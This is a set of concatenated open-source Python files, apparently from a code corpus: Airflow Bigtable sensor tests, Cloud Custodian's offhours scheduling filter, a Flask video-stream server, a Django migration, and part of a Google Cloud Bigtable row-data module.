def test_empty_attribute(self, missing_attribute, project_id, instance_id, table_id,
mock_hook):
with self.assertRaises(AirflowException) as e:
BigtableTableWaitForReplicationSensor(
project_id=project_id,
instance_id=instance_id,
table_id=table_id,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
err = e.exception
self.assertEqual(str(err), 'Empty parameter: {}'.format(missing_attribute))
mock_hook.assert_not_called()
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_wait_no_instance(self, mock_hook):
mock_hook.return_value.get_instance.return_value = None
op = BigtableTableWaitForReplicationSensor(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
table_id=TABLE_ID,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
self.assertFalse(op.poke(None))
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_wait_no_table(self, mock_hook):
mock_hook.return_value.get_instance.return_value = mock.Mock(Instance)
mock_hook.return_value.get_cluster_states_for_table.side_effect = mock.Mock(
side_effect=google.api_core.exceptions.NotFound("Table not found."))
op = BigtableTableWaitForReplicationSensor(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
table_id=TABLE_ID,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
self.assertFalse(op.poke(None))
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_wait_not_ready(self, mock_hook):
mock_hook.return_value.get_instance.return_value = mock.Mock(Instance)
mock_hook.return_value.get_cluster_states_for_table.return_value = {
"cl-id": ClusterState(0)
}
op = BigtableTableWaitForReplicationSensor(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
table_id=TABLE_ID,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
self.assertFalse(op.poke(None))
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_wait_ready(self, mock_hook):
mock_hook.return_value.get_instance.return_value = mock.Mock(Instance)
mock_hook.return_value.get_cluster_states_for_table.return_value = {
"cl-id": ClusterState(4)
}
op = BigtableTableWaitForReplicationSensor(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
table_id=TABLE_ID,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
self.assertTrue(op.poke(None))
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
| owlabs/incubator-airflow | tests/contrib/operators/test_gcp_bigtable_operator.py | Python | apache-2.0 | 31,128 |
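The tests above drive the operators through mocks; wired into a real DAG, the same parameters would be used roughly as below (DAG id, dates and resource names are illustrative only, and the import path matches the contrib module patched in the tests):

# Hypothetical DAG wiring for the operators exercised above; values are illustrative.
from datetime import datetime

from airflow import DAG
from airflow.contrib.operators.gcp_bigtable_operator import (
    BigtableInstanceCreateOperator,
    BigtableTableCreateOperator,
    BigtableTableWaitForReplicationSensor,
)

with DAG(dag_id='example_bigtable', start_date=datetime(2019, 1, 1),
         schedule_interval=None) as dag:
    create_instance = BigtableInstanceCreateOperator(
        task_id='create_instance',
        project_id='test_project_id',
        instance_id='test-instance-id',
        main_cluster_id='test-cluster-id',
        main_cluster_zone='us-central1-f',
    )
    create_table = BigtableTableCreateOperator(
        task_id='create_table',
        project_id='test_project_id',
        instance_id='test-instance-id',
        table_id='test-table-id',
    )
    wait_for_replication = BigtableTableWaitForReplicationSensor(
        task_id='wait_for_replication',
        project_id='test_project_id',
        instance_id='test-instance-id',
        table_id='test-table-id',
    )
    create_instance >> create_table >> wait_for_replication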
# Copyright 2015-2017 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Resource Scheduling Offhours
============================
Custodian provides for time based filters, that allow for taking periodic
action on a resource, with resource schedule customization based on tag values.
A common use is offhours scheduling for asgs and instances.
Features
========
- Flexible offhours scheduling with opt-in, opt-out selection, and timezone
support.
- Resume during offhours support.
- Can be combined with other filters to get a particular set (
resources with tag, vpc, etc).
- Can be combined with arbitrary actions
Policy Configuration
====================
We provide an `onhour` and an `offhour` time filter; each should be used in a
different policy, and they support the same configuration options:
- **weekends**: default true, whether to leave resources off for the weekend
- **weekends-only**: default false, whether to turn the resource off only on
the weekend
- **default_tz**: which timezone to utilize when evaluating time **(REQUIRED)**
- **tag**: which resource tag name to use for per-resource configuration
(schedule and timezone overrides and opt-in/opt-out); default is
``maid_offhours``.
- **opt-out**: Determines the behavior for resources which do not have a tag
matching the one specified for **tag**. Values can be either ``false`` (the
default) where the policy operates on an opt-in basis and resources must have
the tag in order to be acted on by the policy, or ``true`` where the policy
operates on an opt-out basis, and resources without the tag are acted on by
the policy.
- **onhour**: the default time to start/run resources, specified as 0-23
- **offhour**: the default time to stop/suspend resources, specified as 0-23
This example policy overrides most of the defaults for an offhour policy:
.. code-block:: yaml
policies:
- name: offhours-stop
resource: ec2
filters:
- type: offhour
weekends: false
default_tz: pt
tag: downtime
opt-out: true
onhour: 8
offhour: 20
Tag Based Configuration
=======================
Resources can use a special tag to override the default configuration on a
per-resource basis. Note that the name of the tag is configurable via the
``tag`` option in the policy; the examples below use the default tag name,
``maid_offhours``.
The value of the tag must be one of the following:
- **(empty)** or **on** - An empty tag value or a value of "on" implies night
and weekend offhours using the default time zone configured in the policy
(tz=est if unspecified) and the default onhour and offhour values configured
in the policy.
- **off** - If offhours is configured to run in opt-out mode, this tag can be
specified to disable offhours on a given instance. If offhours is configured
to run in opt-in mode, this tag will have no effect (the resource will still
be opted out).
- a semicolon-separated string composed of one or more of the following
components, which override the defaults specified in the policy:
* ``tz=<timezone>`` to evaluate with a resource-specific timezone, where
``<timezone>`` is either one of the supported timezone aliases defined in
:py:attr:`c7n.filters.offhours.Time.TZ_ALIASES` (such as ``pt``) or the name
of a geographic timezone identifier in
[IANA's tzinfo database](https://www.iana.org/time-zones), such as
  ``America/Los_Angeles``. *(Note all timezone aliases are
referenced to a locality to ensure taking into account local daylight
savings time, if applicable.)*
* ``off=(time spec)`` and/or ``on=(time spec)`` matching time specifications
supported by :py:class:`c7n.filters.offhours.ScheduleParser` as described
in the next section.
ScheduleParser Time Specifications
----------------------------------
Each time specification follows the format ``(days,hours)``. Multiple time
specifications can be combined in square-bracketed lists, i.e.
``[(days,hours),(days,hours),(days,hours)]``.
**Examples**::
# up mon-fri from 7am-7pm; eastern time
off=(M-F,19);on=(M-F,7)
# up mon-fri from 6am-9pm; up sun from 10am-6pm; pacific time
off=[(M-F,21),(U,18)];on=[(M-F,6),(U,10)];tz=pt
**Possible values**:
+------------+----------------------+
| field | values |
+============+======================+
| days | M, T, W, H, F, S, U |
+------------+----------------------+
| hours | 0, 1, 2, ..., 22, 23 |
+------------+----------------------+
Days can be specified in a range (ex. M-F).
Policy examples
===============
Turn ec2 instances on and off
.. code-block:: yaml
policies:
- name: offhours-stop
resource: ec2
filters:
- type: offhour
actions:
- stop
- name: offhours-start
resource: ec2
filters:
- type: onhour
actions:
- start
Here's doing the same with auto scale groups
.. code-block:: yaml
policies:
- name: asg-offhours-stop
resource: asg
filters:
- offhour
actions:
- suspend
- name: asg-onhours-start
resource: asg
filters:
- onhour
actions:
- resume
Additional policy examples and resource-type-specific information can be seen in
the :ref:`EC2 Offhours <ec2offhours>` and :ref:`ASG Offhours <asgoffhours>`
use cases.
Resume During Offhours
======================
These policies are evaluated hourly; during each run (once an hour),
cloud-custodian will act on **only** the resources tagged for that **exact**
hour. In other words, if a resource has an offhours policy of
stopping/suspending at 23:00 Eastern daily and starting/resuming at 06:00
Eastern daily, and you run cloud-custodian once an hour via Lambda, that
resource will only be stopped once a day sometime between 23:00 and 23:59, and
will only be started once a day sometime between 06:00 and 06:59. If the current
hour does not *exactly* match the hour specified in the policy, nothing will be
done at all.
As a result of this, if custodian stops an instance or suspends an ASG and you
need to start/resume it, you can safely do so manually and custodian won't touch
it again until the next day.
ElasticBeanstalk, EFS and Other Services with Tag Value Restrictions
====================================================================
A number of AWS services have restrictions on the characters that can be used
in tag values, such as `ElasticBeanstalk <http://docs.aws.amazon.com/elasticbean
stalk/latest/dg/using-features.tagging.html>`_ and `EFS <http://docs.aws.amazon.
com/efs/latest/ug/API_Tag.html>`_. In particular, these services do not allow
parenthesis, square brackets, commas, or semicolons, or empty tag values. This
proves to be problematic with the tag-based schedule configuration described
above. The best current workaround is to define a separate policy with a unique
``tag`` name for each unique schedule that you want to use, and then tag
resources with that tag name and a value of ``on``. Note that this can only be
used in opt-in mode, not opt-out.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
# note we have to module import for our testing mocks
import datetime
import logging
from os.path import join
from dateutil import zoneinfo
from c7n.filters import Filter, FilterValidationError
from c7n.utils import type_schema, dumps
log = logging.getLogger('custodian.offhours')
def brackets_removed(u):
return u.translate({ord('['): None, ord(']'): None})
def parens_removed(u):
return u.translate({ord('('): None, ord(')'): None})
class Time(Filter):
schema = {
'type': 'object',
'properties': {
'tag': {'type': 'string'},
'default_tz': {'type': 'string'},
'weekends': {'type': 'boolean'},
'weekends-only': {'type': 'boolean'},
'opt-out': {'type': 'boolean'},
}
}
time_type = None
# Defaults and constants
DEFAULT_TAG = "maid_offhours"
DEFAULT_TZ = 'et'
TZ_ALIASES = {
'pdt': 'America/Los_Angeles',
'pt': 'America/Los_Angeles',
'pst': 'America/Los_Angeles',
'ast': 'America/Phoenix',
'at': 'America/Phoenix',
'est': 'America/New_York',
'edt': 'America/New_York',
'et': 'America/New_York',
'cst': 'America/Chicago',
'cdt': 'America/Chicago',
'ct': 'America/Chicago',
'mst': 'America/Denver',
'mdt': 'America/Denver',
'mt': 'America/Denver',
'gmt': 'Etc/GMT',
'gt': 'Etc/GMT',
'bst': 'Europe/London',
'ist': 'Europe/Dublin',
'cet': 'Europe/Berlin',
# Technically IST (Indian Standard Time), but that's the same as Ireland
'it': 'Asia/Kolkata',
'jst': 'Asia/Tokyo',
'kst': 'Asia/Seoul',
'sgt': 'Asia/Singapore',
'aet': 'Australia/Sydney',
'brt': 'America/Sao_Paulo'
}
def __init__(self, data, manager=None):
super(Time, self).__init__(data, manager)
self.default_tz = self.data.get('default_tz', self.DEFAULT_TZ)
self.weekends = self.data.get('weekends', True)
self.weekends_only = self.data.get('weekends-only', False)
self.opt_out = self.data.get('opt-out', False)
self.tag_key = self.data.get('tag', self.DEFAULT_TAG).lower()
self.default_schedule = self.get_default_schedule()
self.parser = ScheduleParser(self.default_schedule)
self.id_key = None
self.opted_out = []
self.parse_errors = []
self.enabled_count = 0
def validate(self):
if self.get_tz(self.default_tz) is None:
raise FilterValidationError(
"Invalid timezone specified %s" % self.default_tz)
hour = self.data.get("%shour" % self.time_type, self.DEFAULT_HR)
if hour not in self.parser.VALID_HOURS:
raise FilterValidationError("Invalid hour specified %s" % hour)
return self
def process(self, resources, event=None):
resources = super(Time, self).process(resources)
if self.parse_errors and self.manager and self.manager.log_dir:
self.log.warning("parse errors %d", len(self.parse_errors))
with open(join(
self.manager.log_dir, 'parse_errors.json'), 'w') as fh:
dumps(self.parse_errors, fh=fh)
self.parse_errors = []
if self.opted_out and self.manager and self.manager.log_dir:
self.log.debug("disabled count %d", len(self.opted_out))
with open(join(
self.manager.log_dir, 'opted_out.json'), 'w') as fh:
dumps(self.opted_out, fh=fh)
self.opted_out = []
return resources
def __call__(self, i):
value = self.get_tag_value(i)
# Sigh delayed init, due to circle dep, process/init would be better
# but unit testing is calling this direct.
if self.id_key is None:
self.id_key = (
self.manager is None and 'InstanceId' or self.manager.get_model().id)
# The resource tag is not present, if we're not running in an opt-out
# mode, we're done.
if value is False:
if not self.opt_out:
return False
value = "" # take the defaults
# Resource opt out, track and record
if 'off' == value:
self.opted_out.append(i)
return False
else:
self.enabled_count += 1
try:
return self.process_resource_schedule(i, value, self.time_type)
except:
log.exception(
"%s failed to process resource:%s value:%s",
self.__class__.__name__, i[self.id_key], value)
return False
def process_resource_schedule(self, i, value, time_type):
"""Does the resource tag schedule and policy match the current time."""
rid = i[self.id_key]
# this is to normalize trailing semicolons which when done allows
# dateutil.parser.parse to process: value='off=(m-f,1);' properly.
# before this normalization, some cases would silently fail.
value = ';'.join(filter(None, value.split(';')))
if self.parser.has_resource_schedule(value, time_type):
schedule = self.parser.parse(value)
elif self.parser.keys_are_valid(value):
# respect timezone from tag
raw_data = self.parser.raw_data(value)
if 'tz' in raw_data:
schedule = dict(self.default_schedule)
schedule['tz'] = raw_data['tz']
else:
schedule = self.default_schedule
else:
schedule = None
if schedule is None:
log.warning(
"Invalid schedule on resource:%s value:%s", rid, value)
self.parse_errors.append((rid, value))
return False
tz = self.get_tz(schedule['tz'])
if not tz:
log.warning(
"Could not resolve tz on resource:%s value:%s", rid, value)
self.parse_errors.append((rid, value))
return False
now = datetime.datetime.now(tz).replace(
minute=0, second=0, microsecond=0)
return self.match(now, schedule)
def match(self, now, schedule):
time = schedule.get(self.time_type, ())
for item in time:
days, hour = item.get("days"), item.get('hour')
if now.weekday() in days and now.hour == hour:
return True
return False
def get_tag_value(self, i):
"""Get the resource's tag value specifying its schedule."""
# Look for the tag, Normalize tag key and tag value
found = False
for t in i.get('Tags', ()):
if t['Key'].lower() == self.tag_key:
found = t['Value']
break
if found is False:
return False
# enforce utf8, or do translate tables via unicode ord mapping
value = found.lower().encode('utf8').decode('utf8')
# Some folks seem to be interpreting the docs quote marks as
# literal for values.
value = value.strip("'").strip('"')
return value
@classmethod
def get_tz(cls, tz):
return zoneinfo.gettz(cls.TZ_ALIASES.get(tz, tz))
def get_default_schedule(self):
raise NotImplementedError("use subclass")
class OffHour(Time):
schema = type_schema(
'offhour', rinherit=Time.schema, required=['offhour', 'default_tz'],
offhour={'type': 'integer', 'minimum': 0, 'maximum': 23})
time_type = "off"
DEFAULT_HR = 19
def get_default_schedule(self):
default = {'tz': self.default_tz, self.time_type: [
{'hour': self.data.get(
"%shour" % self.time_type, self.DEFAULT_HR)}]}
if self.weekends_only:
default[self.time_type][0]['days'] = [4]
elif self.weekends:
default[self.time_type][0]['days'] = tuple(range(5))
else:
default[self.time_type][0]['days'] = tuple(range(7))
return default
class OnHour(Time):
schema = type_schema(
'onhour', rinherit=Time.schema, required=['onhour', 'default_tz'],
onhour={'type': 'integer', 'minimum': 0, 'maximum': 23})
time_type = "on"
DEFAULT_HR = 7
def get_default_schedule(self):
default = {'tz': self.default_tz, self.time_type: [
{'hour': self.data.get(
"%shour" % self.time_type, self.DEFAULT_HR)}]}
if self.weekends_only:
# turn on monday
default[self.time_type][0]['days'] = [0]
elif self.weekends:
default[self.time_type][0]['days'] = tuple(range(5))
else:
default[self.time_type][0]['days'] = tuple(range(7))
return default
class ScheduleParser(object):
"""Parses tag values for custom on/off hours schedules.
At the minimum the ``on`` and ``off`` values are required. Each of
    these must be separated by a ``;`` in the format described below.
**Schedule format**::
# up mon-fri from 7am-7pm; eastern time
off=(M-F,19);on=(M-F,7)
# up mon-fri from 6am-9pm; up sun from 10am-6pm; pacific time
off=[(M-F,21),(U,18)];on=[(M-F,6),(U,10)];tz=pt
**Possible values**:
+------------+----------------------+
| field | values |
+============+======================+
| days | M, T, W, H, F, S, U |
+------------+----------------------+
| hours | 0, 1, 2, ..., 22, 23 |
+------------+----------------------+
Days can be specified in a range (ex. M-F).
If the timezone is not supplied, it is assumed ET (eastern time), but this
default can be configurable.
**Parser output**:
The schedule parser will return a ``dict`` or ``None`` (if the schedule is
invalid)::
# off=[(M-F,21),(U,18)];on=[(M-F,6),(U,10)];tz=pt
{
off: [
{ days: "M-F", hour: 21 },
{ days: "U", hour: 18 }
],
on: [
{ days: "M-F", hour: 6 },
{ days: "U", hour: 10 }
],
tz: "pt"
}
"""
DAY_MAP = {'m': 0, 't': 1, 'w': 2, 'h': 3, 'f': 4, 's': 5, 'u': 6}
VALID_HOURS = tuple(range(24))
def __init__(self, default_schedule):
self.default_schedule = default_schedule
self.cache = {}
@staticmethod
def raw_data(tag_value):
"""convert the tag to a dictionary, taking values as is
This method name and purpose are opaque... and not true.
"""
data = {}
pieces = []
for p in tag_value.split(' '):
pieces.extend(p.split(';'))
# parse components
for piece in pieces:
kv = piece.split('=')
            # components must be key=value
if not len(kv) == 2:
continue
key, value = kv
data[key] = value
return data
def keys_are_valid(self, tag_value):
"""test that provided tag keys are valid"""
for key in ScheduleParser.raw_data(tag_value):
if key not in ('on', 'off', 'tz'):
return False
return True
def parse(self, tag_value):
# check the cache
if tag_value in self.cache:
return self.cache[tag_value]
schedule = {}
if not self.keys_are_valid(tag_value):
return None
# parse schedule components
pieces = tag_value.split(';')
for piece in pieces:
kv = piece.split('=')
            # components must be key=value
if not len(kv) == 2:
return None
key, value = kv
if key != 'tz':
value = self.parse_resource_schedule(value)
if value is None:
return None
schedule[key] = value
# add default timezone, if none supplied or blank
if not schedule.get('tz'):
schedule['tz'] = self.default_schedule['tz']
# cache
self.cache[tag_value] = schedule
return schedule
@staticmethod
def has_resource_schedule(tag_value, time_type):
raw_data = ScheduleParser.raw_data(tag_value)
# note time_type is set to 'on' or 'off' and raw_data is a dict
return time_type in raw_data
def parse_resource_schedule(self, lexeme):
parsed = []
exprs = brackets_removed(lexeme).split(',(')
for e in exprs:
tokens = parens_removed(e).split(',')
# custom hours must have two parts: (<days>, <hour>)
if not len(tokens) == 2:
return None
if not tokens[1].isdigit():
return None
hour = int(tokens[1])
if hour not in self.VALID_HOURS:
return None
days = self.expand_day_range(tokens[0])
if not days:
return None
parsed.append({'days': days, 'hour': hour})
return parsed
def expand_day_range(self, days):
# single day specified
if days in self.DAY_MAP:
return [self.DAY_MAP[days]]
day_range = [d for d in map(self.DAY_MAP.get, days.split('-'))
if d is not None]
if not len(day_range) == 2:
return None
# support wrap around days aka friday-monday = 4,5,6,0
if day_range[0] > day_range[1]:
return list(range(day_range[0], 7)) + list(range(day_range[1] + 1))
return list(range(min(day_range), max(day_range) + 1))
| sixfeetup/cloud-custodian | c7n/filters/offhours.py | Python | apache-2.0 | 21,487 |
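The module docstring above spells out the `off=(days,hours);on=(days,hours);tz=<tz>` tag grammar. A small sketch of what `ScheduleParser` returns for such a value (the filter lowercases tag values before parsing, hence the lowercase day letters; the default schedule dict mirrors what `OffHour.get_default_schedule()` builds):

from c7n.filters.offhours import ScheduleParser

# Default used only when the tag omits its own schedule; shape matches get_default_schedule().
default_schedule = {'tz': 'et', 'off': [{'days': list(range(5)), 'hour': 19}]}
parser = ScheduleParser(default_schedule)

# Tag values reach the parser lowercased by Time.get_tag_value().
tag = 'off=[(m-f,21),(u,18)];on=[(m-f,6),(u,10)];tz=pt'
print(parser.parse(tag))
# -> {'off': [{'days': [0, 1, 2, 3, 4], 'hour': 21}, {'days': [6], 'hour': 18}],
#     'on': [{'days': [0, 1, 2, 3, 4], 'hour': 6}, {'days': [6], 'hour': 10}],
#     'tz': 'pt'}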
from flask import Flask, Response, make_response
from video_stream_handler import stream_handler
import logging
import cv2
# see line 398 of connectionpool.py:
logging.basicConfig(level=logging.DEBUG)
thetav = None
app = Flask(__name__, static_url_path='/public', static_folder='../')
@app.route('/video_feed')
def video_feed():
cap = cv2.VideoCapture(0)
# cap.set(3, 3840)
# cap.set(4, 1920)
return Response(stream_handler(cap), mimetype='multipart/x-mixed-replace; boundary=frame')
if __name__ == '__main__':
app.run(host='0.0.0.0', threaded=True)
| rwoodley/SphericalPhotoBrowser | server/server.py | Python | apache-2.0 | 578 |
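server.py imports `stream_handler` from a `video_stream_handler` module that is not part of this dump. A hypothetical generator compatible with the `multipart/x-mixed-replace; boundary=frame` response used above would typically JPEG-encode each captured frame and yield it between multipart boundaries:

# video_stream_handler.py -- hypothetical sketch; the real module is not shown here.
import cv2


def stream_handler(cap):
    """Yield JPEG frames delimited by the `frame` boundary declared in server.py."""
    while True:
        grabbed, frame = cap.read()
        if not grabbed:
            break
        ok, jpeg = cv2.imencode('.jpg', frame)
        if not ok:
            continue
        yield (b'--frame\r\n'
               b'Content-Type: image/jpeg\r\n\r\n' + jpeg.tobytes() + b'\r\n')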
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-13 01:17
from __future__ import unicode_literals
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
dependencies = [
('dash', '0002_remove_post_origin'),
]
operations = [
migrations.AlterField(
model_name='comment',
name='id',
field=models.UUIDField(default=uuid.uuid4, primary_key=True, serialize=False),
),
]
| CMPUT404W17T06/CMPUT404-project | dash/migrations/0003_auto_20170313_0117.py | Python | apache-2.0 | 497 |
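For context, the AlterField above pins `Comment.id` down as a UUID primary key with a `uuid.uuid4` default; the corresponding field on the model would look roughly like this (nothing else about the `Comment` model is implied by the migration):

# Hypothetical dash/models.py excerpt consistent with the migration above.
import uuid

from django.db import models


class Comment(models.Model):
    id = models.UUIDField(primary_key=True, default=uuid.uuid4)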
# Copyright 2016 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Container for Google Cloud Bigtable Cells and Streaming Row Contents."""
import copy
import six
from gcloud._helpers import _datetime_from_microseconds
from gcloud._helpers import _to_bytes
class Cell(object):
"""Representation of a Google Cloud Bigtable Cell.
:type value: bytes
:param value: The value stored in the cell.
:type timestamp: :class:`datetime.datetime`
:param timestamp: The timestamp when the cell was stored.
:type labels: list
:param labels: (Optional) List of strings. Labels applied to the cell.
"""
def __init__(self, value, timestamp, labels=()):
self.value = value
self.timestamp = timestamp
self.labels = list(labels)
@classmethod
def from_pb(cls, cell_pb):
"""Create a new cell from a Cell protobuf.
:type cell_pb: :class:`._generated.data_pb2.Cell`
:param cell_pb: The protobuf to convert.
:rtype: :class:`Cell`
:returns: The cell corresponding to the protobuf.
"""
timestamp = _datetime_from_microseconds(cell_pb.timestamp_micros)
if cell_pb.labels:
return cls(cell_pb.value, timestamp, labels=cell_pb.labels)
else:
return cls(cell_pb.value, timestamp)
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
return (other.value == self.value and
other.timestamp == self.timestamp and
other.labels == self.labels)
def __ne__(self, other):
return not self.__eq__(other)
class PartialCellData(object):
"""Representation of partial cell in a Google Cloud Bigtable Table.
These are expected to be updated directly from a
:class:`._generated.bigtable_service_messages_pb2.ReadRowsResponse`
:type row_key: bytes
:param row_key: The key for the row holding the (partial) cell.
:type family_name: str
:param family_name: The family name of the (partial) cell.
:type qualifier: bytes
:param qualifier: The column qualifier of the (partial) cell.
:type timestamp_micros: int
    :param timestamp_micros: The timestamp (in microseconds) of the
(partial) cell.
:type labels: list of str
:param labels: labels assigned to the (partial) cell
:type value: bytes
:param value: The (accumulated) value of the (partial) cell.
"""
def __init__(self, row_key, family_name, qualifier, timestamp_micros,
labels=(), value=b''):
self.row_key = row_key
self.family_name = family_name
self.qualifier = qualifier
self.timestamp_micros = timestamp_micros
self.labels = labels
self.value = value
def append_value(self, value):
"""Append bytes from a new chunk to value.
:type value: bytes
:param value: bytes to append
"""
self.value += value
class PartialRowData(object):
"""Representation of partial row in a Google Cloud Bigtable Table.
These are expected to be updated directly from a
:class:`._generated.bigtable_service_messages_pb2.ReadRowsResponse`
:type row_key: bytes
:param row_key: The key for the row holding the (partial) data.
"""
def __init__(self, row_key):
self._row_key = row_key
self._cells = {}
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
return (other._row_key == self._row_key and
other._cells == self._cells)
def __ne__(self, other):
return not self.__eq__(other)
def to_dict(self):
"""Convert the cells to a dictionary.
This is intended to be used with HappyBase, so the column family and
        column qualifiers are combined (with ``:``).
:rtype: dict
:returns: Dictionary containing all the data in the cells of this row.
"""
result = {}
for column_family_id, columns in six.iteritems(self._cells):
for column_qual, cells in six.iteritems(columns):
key = (_to_bytes(column_family_id) + b':' +
_to_bytes(column_qual))
result[key] = cells
return result
@property
def cells(self):
"""Property returning all the cells accumulated on this partial row.
:rtype: dict
:returns: Dictionary of the :class:`Cell` objects accumulated. This
dictionary has two-levels of keys (first for column families
and second for column names/qualifiers within a family). For
a given column, a list of :class:`Cell` objects is stored.
"""
return copy.deepcopy(self._cells)
@property
def row_key(self):
"""Getter for the current (partial) row's key.
:rtype: bytes
:returns: The current (partial) row's key.
"""
return self._row_key
class InvalidReadRowsResponse(RuntimeError):
"""Exception raised to to invalid response data from back-end."""
class InvalidChunk(RuntimeError):
"""Exception raised to to invalid chunk data from back-end."""
class PartialRowsData(object):
"""Convenience wrapper for consuming a ``ReadRows`` streaming response.
:type response_iterator:
:class:`grpc.framework.alpha._reexport._CancellableIterator`
:param response_iterator: A streaming iterator returned from a
``ReadRows`` request.
"""
START = "Start" # No responses yet processed.
NEW_ROW = "New row" # No cells yet complete for row
ROW_IN_PROGRESS = "Row in progress" # Some cells complete for row
CELL_IN_PROGRESS = "Cell in progress" # Incomplete cell for row
def __init__(self, response_iterator):
self._response_iterator = response_iterator
# Fully-processed rows, keyed by `row_key`
self._rows = {}
# Counter for responses pulled from iterator
self._counter = 0
# Maybe cached from previous response
self._last_scanned_row_key = None
# In-progress row, unset until first response, after commit/reset
self._row = None
# Last complete row, unset until first commit
self._previous_row = None
# In-progress cell, unset until first response, after completion
self._cell = None
# Last complete cell, unset until first completion, after new row
self._previous_cell = None
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
return other._response_iterator == self._response_iterator
def __ne__(self, other):
return not self.__eq__(other)
@property
def state(self):
"""State machine state.
:rtype: str
:returns: name of state corresponding to current row / chunk
processing.
"""
if self._last_scanned_row_key is None:
return self.START
if self._row is None:
assert self._cell is None
assert self._previous_cell is None
return self.NEW_ROW
if self._cell is not None:
return self.CELL_IN_PROGRESS
if self._previous_cell is not None:
return self.ROW_IN_PROGRESS
return self.NEW_ROW # row added, no chunk yet processed
@property
def rows(self):
"""Property returning all rows accumulated from the stream.
:rtype: dict
:returns: row_key -> :class:`PartialRowData`.
"""
# NOTE: To avoid duplicating large objects, this is just the
# mutable private data.
return self._rows
def cancel(self):
"""Cancels the iterator, closing the stream."""
self._response_iterator.cancel()
def consume_next(self):
"""Consume the next ``ReadRowsResponse`` from the stream.
Parse the response and its chunks into a new/existing row in
:attr:`_rows`
"""
response = six.next(self._response_iterator)
self._counter += 1
if self._last_scanned_row_key is None: # first response
if response.last_scanned_row_key:
raise InvalidReadRowsResponse()
self._last_scanned_row_key = response.last_scanned_row_key
row = self._row
cell = self._cell
for chunk in response.chunks:
self._validate_chunk(chunk)
if chunk.reset_row:
row = self._row = None
cell = self._cell = self._previous_cell = None
continue
if row is None:
row = self._row = PartialRowData(chunk.row_key)
if cell is None:
cell = self._cell = PartialCellData(
chunk.row_key,
chunk.family_name.value,
chunk.qualifier.value,
chunk.timestamp_micros,
chunk.labels,
chunk.value)
self._copy_from_previous(cell)
else:
cell.append_value(chunk.value)
if chunk.commit_row:
self._save_current_row()
row = cell = None
continue
if chunk.value_size == 0:
self._save_current_cell()
cell = None
def consume_all(self, max_loops=None):
"""Consume the streamed responses until there are no more.
This simply calls :meth:`consume_next` until there are no
more to consume.
:type max_loops: int
:param max_loops: (Optional) Maximum number of times to try to consume
an additional ``ReadRowsResponse``. You can use this
to avoid long wait times.
"""
curr_loop = 0
if max_loops is None:
max_loops = float('inf')
while curr_loop < max_loops:
curr_loop += 1
try:
self.consume_next()
except StopIteration:
break
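# Illustrative sketch (not part of the original class): typical consumption of
# a stream, assuming ``response_iterator`` came from a ``ReadRows`` call and
# ``process_row`` is a hypothetical callback.
#
#   partial_rows = PartialRowsData(response_iterator)
#   partial_rows.consume_all()
#   for row_key, row in partial_rows.rows.items():
#       process_row(row_key, row.to_dict())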
@staticmethod
def _validate_chunk_status(chunk):
"""Helper for :meth:`_validate_chunk_row_in_progress`, etc."""
# No reset with other keys
if chunk.reset_row:
_raise_if(chunk.row_key)
_raise_if(chunk.HasField('family_name'))
_raise_if(chunk.HasField('qualifier'))
_raise_if(chunk.timestamp_micros)
_raise_if(chunk.labels)
_raise_if(chunk.value_size)
_raise_if(chunk.value)
# No commit with value size
_raise_if(chunk.commit_row and chunk.value_size > 0)
# No negative value_size (inferred as a general constraint).
_raise_if(chunk.value_size < 0)
def _validate_chunk_new_row(self, chunk):
"""Helper for :meth:`_validate_chunk`."""
assert self.state == self.NEW_ROW
_raise_if(chunk.reset_row)
_raise_if(not chunk.row_key)
_raise_if(not chunk.family_name)
_raise_if(not chunk.qualifier)
# This constraint is not enforced in the Go example.
_raise_if(chunk.value_size > 0 and chunk.commit_row is not False)
# This constraint is from the Go example, not the spec.
_raise_if(self._previous_row is not None and
chunk.row_key <= self._previous_row.row_key)
def _same_as_previous(self, chunk):
"""Helper for :meth:`_validate_chunk_row_in_progress`"""
previous = self._previous_cell
return (chunk.row_key == previous.row_key and
chunk.family_name == previous.family_name and
chunk.qualifier == previous.qualifier and
chunk.labels == previous.labels)
def _validate_chunk_row_in_progress(self, chunk):
"""Helper for :meth:`_validate_chunk`"""
assert self.state == self.ROW_IN_PROGRESS
self._validate_chunk_status(chunk)
if not chunk.HasField('commit_row') and not chunk.reset_row:
_raise_if(not chunk.timestamp_micros or not chunk.value)
